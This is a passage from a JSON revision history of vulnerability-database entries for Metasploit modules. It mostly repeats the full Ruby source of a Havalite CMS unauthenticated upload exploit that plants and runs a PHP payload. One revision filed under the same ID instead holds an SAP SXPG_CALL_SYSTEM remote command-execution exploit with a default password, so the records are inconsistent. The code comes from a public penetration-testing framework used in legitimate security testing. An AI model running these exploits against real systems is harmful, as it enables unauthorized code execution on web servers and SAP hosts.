\"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-21T02:28:24", "differentElements": ["sourceData"], "edition": 81}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "ebd00bcd8f62fd87e7aeeeb365c70a45", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-02T09:56:39", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 4.5, "vector": "NONE", "modified": "2019-07-02T09:56:39"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:1652", "RHSA-2019:1650"]}, {"type": "f5", "idList": ["F5:K61002104"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4475-1:F4ED8", "DEBIAN:DSA-4474-1:307BE", "DEBIAN:DLA-1842-1:F4FA5", "DEBIAN:DLA-1837-2:545B2"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1688-1", "OPENSUSE-SU-2019:1682-1", "OPENSUSE-SU-2019:1683-1", "OPENSUSE-SU-2019:1671-1", "OPENSUSE-SU-2019:1672-1"]}, {"type": "centos", "idList": ["CESA-2019:1624", "CESA-2019:1604", "CESA-2019:1619", "CESA-2019:1626", "CESA-2019:1603"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:3DE63687DC86330D338555D366AA18D3"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:5E2208DC182B2AA0CFD7A09B6797D218"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5AED45D6F563E6F048D9FCACECC650CC"]}], "modified": "2019-07-02T09:56:39"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-02T09:56:39", "differentElements": ["sourceData"], "edition": 82}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-02T11:54:35", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2019-07-02T11:54:35"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:1663", "RHSA-2019:1661", "RHSA-2019:1652", "RHSA-2019:1650"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1689-1", "OPENSUSE-SU-2019:1690-1", "OPENSUSE-SU-2019:1688-1", "OPENSUSE-SU-2019:1682-1", "OPENSUSE-SU-2019:1683-1"]}, {"type": "f5", "idList": ["F5:K61002104"]}, {"type": "exploitdb", "idList": ["EDB-ID:47070"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4475-1:F4ED8", "DEBIAN:DSA-4474-1:307BE", "DEBIAN:DLA-1842-1:F4FA5"]}, {"type": "centos", "idList": ["CESA-2019:1624", "CESA-2019:1604", "CESA-2019:1619", "CESA-2019:1626", "CESA-2019:1603"]}, {"type": "cve", "idList": ["CVE-2019-4057"]}], "modified": "2019-07-02T11:54:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-02T11:54:35", "differentElements": ["sourceData"], "edition": 83}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "ebd00bcd8f62fd87e7aeeeb365c70a45", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-10T19:36:25", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2019-07-02T11:54:35"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:1663", "RHSA-2019:1661", "RHSA-2019:1652", "RHSA-2019:1650"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1689-1", "OPENSUSE-SU-2019:1690-1", "OPENSUSE-SU-2019:1688-1", "OPENSUSE-SU-2019:1682-1", "OPENSUSE-SU-2019:1683-1"]}, {"type": "f5", "idList": ["F5:K61002104"]}, {"type": "exploitdb", "idList": ["EDB-ID:47070"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4475-1:F4ED8", "DEBIAN:DSA-4474-1:307BE", "DEBIAN:DLA-1842-1:F4FA5"]}, {"type": "centos", "idList": ["CESA-2019:1624", "CESA-2019:1604", "CESA-2019:1619", "CESA-2019:1626", "CESA-2019:1603"]}, {"type": "cve", "idList": ["CVE-2019-4057"]}], "modified": "2019-07-02T11:54:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-10T19:36:25", "differentElements": ["sourceData"], "edition": 84}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-10T20:27:17", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.1, "vector": "NONE", "modified": "2019-07-10T20:27:17"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:1742", "RHSA-2019:1726", "RHSA-2019:1723", "RHSA-2019:1722", "RHSA-2019:1714", "RHSA-2019:1712", "RHSA-2019:1711", "RHSA-2019:1708", "RHSA-2019:1707", "RHSA-2019:1706"]}, {"type": "zdt", "idList": ["1337DAY-ID-32964"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-1726"]}, {"type": "xen", "idList": ["XSA-300"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1848-1:EAD27", "DEBIAN:DLA-1849-1:F1C41", "DEBIAN:DSA-4477-1:C1A86"]}, {"type": "ubuntu", "idList": ["USN-4051-1", "USN-4052-1"]}, {"type": "freebsd", "idList": ["0592F49F-B3B8-4260-B648-D1718762656C"]}], "modified": "2019-07-10T20:27:17"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-10T20:27:17", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 85}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "3182350f85970b0c24027f622debf206", "type": "metasploit", "bulletinFamily": "exploit", "title": "SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution", "description": "This module abuses the SAP NetWeaver SXPG_CALL_SYSTEM function, on the SAP SOAP RFC Service, to execute remote commands. This module needs SAP credentials with privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested successfully on Windows 2008 64-bit and Linux 64-bit platforms.\n", "published": "2013-05-07T22:01:56", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"], "cvelist": [], "lastseen": "2019-07-22T06:53:51", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2019-07-22T06:53:51"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1785-1", "OPENSUSE-SU-2019:1782-1", "OPENSUSE-SU-2019:1781-1", "OPENSUSE-SU-2019:1777-1", "OPENSUSE-SU-2019:1780-1", "OPENSUSE-SU-2019:1775-1", "OPENSUSE-SU-2019:1771-1", "OPENSUSE-SU-2019:1773-1", "OPENSUSE-SU-2019:1759-1", "OPENSUSE-SU-2019:1767-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1859-1:5A253", "DEBIAN:DSA-4486-1:B09C5", "DEBIAN:DSA-4485-1:63763", "DEBIAN:DLA-1858-1:1A45F", "DEBIAN:DLA-1857-1:9A05E"]}], "modified": "2019-07-22T06:53:51"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n##\n# This module is based on, inspired by, or is a port of a plugin available in\n# the Onapsis Bizploit Opensource ERP Penetration Testing framework -\n# http://www.onapsis.com/research-free-solutions.php.\n# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts\n# in producing the Metasploit modules and was happy to share his knowledge and\n# experience - a very cool guy.\n#\n# The following guys from ERP-SCAN deserve credit for their contributions -\n# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and\n# Dmitry Evdokimov.\n#\n# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis\n# who have Beta tested the modules and provided excellent feedback. Some people\n# just seem to enjoy hacking SAP :)\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpClient\n\n def initialize\n super(\n 'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution',\n 'Description' => %q{\n This module abuses the SAP NetWeaver SXPG_CALL_SYSTEM function, on the SAP SOAP\n RFC Service, to execute remote commands. This module needs SAP credentials with\n privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested\n successfully on Windows 2008 64-bit and Linux 64-bit platforms.\n },\n 'References' =>\n [\n [ 'OSVDB', '93537' ],\n [ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]\n ],\n 'DisclosureDate' => 'Mar 26 2013',\n 'Platform' => %w{ unix win },\n 'Targets' => [\n [ 'Linux',\n {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix'\n #'Payload' =>\n #{\n #'DisableNops' => true,\n #'Space' => 232,\n #'Compat' =>\n #{\n #'PayloadType' => 'cmd',\n #'RequiredCmd' => 'perl ruby',\n #}\n #}\n }\n ],\n [ 'Windows x64',\n {\n 'Arch' => ARCH_X64,\n 'Platform' => 'win',\n 'CmdStagerFlavor' => 'vbs'\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'Author' =>\n [\n 'nmonkee'\n ],\n 'License' => MSF_LICENSE\n )\n register_options(\n [\n Opt::RPORT(8000),\n OptString.new('CLIENT', [true, 'SAP Client', '001']),\n OptString.new('HttpUsername', [true, 'Username', 'SAP*']),\n OptString.new('HttpPassword', [true, 'Password', '06071992'])\n ])\n register_advanced_options(\n [\n OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments (Windows Target)', 250]),\n ])\n end\n\n def send_soap_request(data)\n res = send_request_cgi({\n 'uri' => '/sap/bc/soap/rfc',\n 'method' => 'POST',\n 'data' => data,\n 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),\n 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],\n 'ctype' => 'text/xml; charset=UTF-8',\n 'headers' => {\n 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',\n },\n 'vars_get' => {\n 'sap-client' => datastore['CLIENT'],\n 'sap-language' => 'EN'\n }\n })\n return res\n end\n\n def build_soap_request(command, sap_command, sap_os)\n data = \"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\" ?>\"\n data << \"<env:Envelope xmlns:xsd=\\\"http://www.w3.org/2001/XMLSchema\\\" xmlns:env=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" xmlns:xsi=\\\"http://www.w3.org/2001/XMLSchema-instance\\\">\"\n data << \"<env:Body>\"\n data << \"<n1:SXPG_CALL_SYSTEM xmlns:n1=\\\"urn:sap-com:document:sap:rfc:functions\\\" env:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\">\"\n data << \"<ADDITIONAL_PARAMETERS>#{command}</ADDITIONAL_PARAMETERS>\"\n data << \"<COMMANDNAME>#{sap_command}</COMMANDNAME>\"\n data << \"<OPERATINGSYSTEM>#{sap_os}</OPERATINGSYSTEM>\"\n data << \"<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>\"\n data << \"</n1:SXPG_CALL_SYSTEM>\"\n data << \"</env:Body>\"\n data << \"</env:Envelope>\"\n return data\n end\n\n def check\n data = rand_text_alphanumeric(4 + rand(4))\n res = send_soap_request(data)\n if res and res.code == 500 and res.body =~ /faultstring/\n return Exploit::CheckCode::Detected\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n if target.name =~ /Windows/\n linemax = datastore['PAYLOAD_SPLIT']\n vprint_status(\"#{rhost}:#{rport} - Using custom payload size of #{linemax}\") if linemax != 250\n print_status(\"#{rhost}:#{rport} - Sending SOAP SXPG_CALL_SYSTEM request\")\n execute_cmdstager({ :delay => 0.35, :linemax => linemax })\n elsif target.name =~ /Linux/\n file = rand_text_alphanumeric(5)\n stage_one = create_unix_payload(1,file)\n print_status(\"#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...\")\n res = send_soap_request(stage_one)\n if res and res.code == 200 and res.body =~ /External program terminated/\n print_good(\"#{rhost}:#{rport} - Payload dump was successful\")\n else\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Payload dump failed\")\n end\n stage_two = create_unix_payload(2,file)\n print_status(\"#{rhost}:#{rport} - Executing /tmp/#{file}...\")\n send_soap_request(stage_two)\n end\n end\n\n def create_unix_payload(stage, file)\n command = \"\"\n if target.name =~ /Linux/\n if stage == 1\n my_payload = payload.encoded.gsub(\" \",\"\\t\")\n my_payload.gsub!(\"&\",\"&\")\n my_payload.gsub!(\"<\",\"<\")\n command = \"-o /tmp/\" + file + \" -n pwnie\" + \"\\n!\"\n command << my_payload\n command << \"\\n\"\n elsif stage == 2\n command = \"-ic /tmp/\" + file\n end\n\n end\n\n return build_soap_request(command.to_s, \"DBMCLI\", \"ANYOS\")\n end\n\n def execute_command(cmd, opts)\n command = cmd.gsub(/&/, \"&\")\n command.gsub!(/%TEMP%\\\\/, \"\")\n data = build_soap_request(\"&#{command}\", \"LIST_DB2DUMP\", \"ANYOS\")\n begin\n res = send_soap_request(data)\n if res and res.code == 200\n return\n else\n if res and res.body =~ /faultstring/\n error = res.body.scan(%r{<faultstring>(.*?)</faultstring>})\n 0.upto(error.length-1) do |i|\n vprint_error(\"#{rhost}:#{rport} - Error #{error[i]}\")\n end\n end\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Error injecting command\")\n end\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{rhost}:#{rport} - Unable to connect\")\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-22T06:53:51", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 86}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-22T08:58:43", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.1, "vector": "NONE", "modified": "2019-07-22T08:58:43"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1785-1", "OPENSUSE-SU-2019:1782-1", "OPENSUSE-SU-2019:1781-1", "OPENSUSE-SU-2019:1777-1", "OPENSUSE-SU-2019:1780-1", "OPENSUSE-SU-2019:1775-1", "OPENSUSE-SU-2019:1771-1", "OPENSUSE-SU-2019:1773-1", "OPENSUSE-SU-2019:1759-1", "OPENSUSE-SU-2019:1767-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1859-1:5A253", "DEBIAN:DSA-4486-1:B09C5", "DEBIAN:DSA-4485-1:63763", "DEBIAN:DLA-1858-1:1A45F", "DEBIAN:DLA-1857-1:9A05E"]}], "modified": "2019-07-22T08:58:43"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-22T08:58:43", "differentElements": ["sourceData"], "edition": 87}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "ebd00bcd8f62fd87e7aeeeb365c70a45", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], 